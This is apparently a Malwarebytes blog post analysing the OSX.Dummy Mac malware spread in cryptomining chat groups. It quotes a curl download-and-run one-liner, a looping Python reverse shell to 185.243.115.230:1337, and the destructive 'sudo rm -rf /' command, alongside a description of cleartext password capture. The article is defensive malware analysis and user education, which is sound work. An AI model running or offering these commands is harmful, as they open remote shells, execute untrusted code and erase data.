Mac malware targets cryptomining users

Mac malware targets cryptomining users

Last week, a security researcher named Remco Verhoef announced the discovery of a new piece of Mac malware being distributed on cryptomining chat groups. This malware was later further analyzed by Patrick Wardle, who gave it the rather appropriate moniker OSX.Dummy.

The malware was being distributed by chat users posing as admins, who posted the following shell script for users to run:

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

This script downloads an executable file named script from a malicious site, gives it executable permissions, then launches it. This script is a ridiculous 34 megabytes in size, and seems to do no more than create a shell script file and a launch daemon to keep it running.

The shell script itself uses Python to open a reverse shell to port 1337 on a malicious server, giving the hacker behind the malware continued access to the computer.

#!/bin/bash while : do   python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'   sleep 5 done

All in all, this malware is not particularly exceptional, and it lives up to the name OSX.Dummy in multiple ways. However, there are a few interesting things to note about this malware.

Risks posed by posted scripts

The method of distribution is interesting. People on forums and other online sources have been giving instructions that involve running commands at the command line—in the Terminal on a Mac—for many years, and still do today.

As an example, one user on Apple’s forums used to give users a highly obfuscated shell command consisting of tens of thousands of characters, with instructions to copy and paste it into the Terminal to run it. This script was run by users of the forums, and the output of the script posted there—thousands of times.

Fortunately, this script was not malicious, but it easily could have been, and its obfuscated nature should have raised suspicions. Yes users still ran it, without any understanding of what it did, because they trusted a stranger on a forum.

There have been other cases in the past of scripts being posted that were actually malicious in nature. The most well known of these was an infamous trick where users were told to run the following command to cure whatever problem they were having:

sudo rm -rf /

Unfortunately for users who actually followed directions like these, this command actually erases the hard drive.

Thus, there’s precedent for being suspicious of shell scripts posted online, yet even so, many people will still run highly suspicious scripts without a care. Readers are encouraged to educate users about the dangers of this behavior at every opportunity.

Risks posed by previous infections

When first run, the script executable asks for a password. This looks like the standard sudo behavior in the command line, but actually, the malware is getting the password. The malware creates a couple small data files called dumpdummy—one in /Users/Shared/ and one in /tmp/—and stores the password there, presumably for possible future use.

Having your password stored in clear text inside a file that can be readable by anyone on the computer poses a serious security threat. Worse, since this file is just data and not actually malicious, it’s likely that most antivirus software won’t detect it. This means that you might have removed the infection, but the dumpdummy file remains, posing a possible future security risk.

This is far from the first time that malware has done such things. This means that, even if your computer is not currently infected, it’s entirely possible that your password can be found in clear text somewhere on your hard drive, as a remnant from a previous infection. Future malware could be designed to find the locations of these files created by the previous malware, gaining access to your password for free.

Malwarebytes for Mac will remove such traces in addition to the malicious executables.

Risks posed by unsigned malware

Most, though not all, Mac malware these days is cryptographically signed with a certificate issued by Apple. These certificates are not hard to obtain, costing no more than $99 to get a developer account with Apple. The good thing about this is that once the malware is spotted by Apple, the certificate can be revoked, killing the malware.

However, there are some issues with the way macOS handles code signing, and this can’t be relied on. As Wardle pointed out in his analysis, the fact that this malware is not signed is irrelevant, since macOS does not check the code signature for a process that is executed from the command line.

More information on how code signing can be a problem on macOS will be presented at this year’s Virus Bulletin conference.

Target: cryptocurrency theft

In all, this malware is not highly likely to be widespread, and you’ll probably know if you’ve been infected after reading a description of the malware.

We don’t yet know exactly what the hacker(s) behind the malware may intend to do with access to the infected machines, but given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency.

If you think you might have been infected, Malwarebytes will remove the malware, including the dumpdummy files containing your password.

If you do IT or security work for a business, be sure to block access to the IP address that the shell script will try to connect to (185.243.115.230).

ABOUT THE AUTHOR

Thomas Reed

Director of Mac & Mobile

Had a Mac before it was cool to have Macs. Self-trained Apple security expert. Amateur photographer.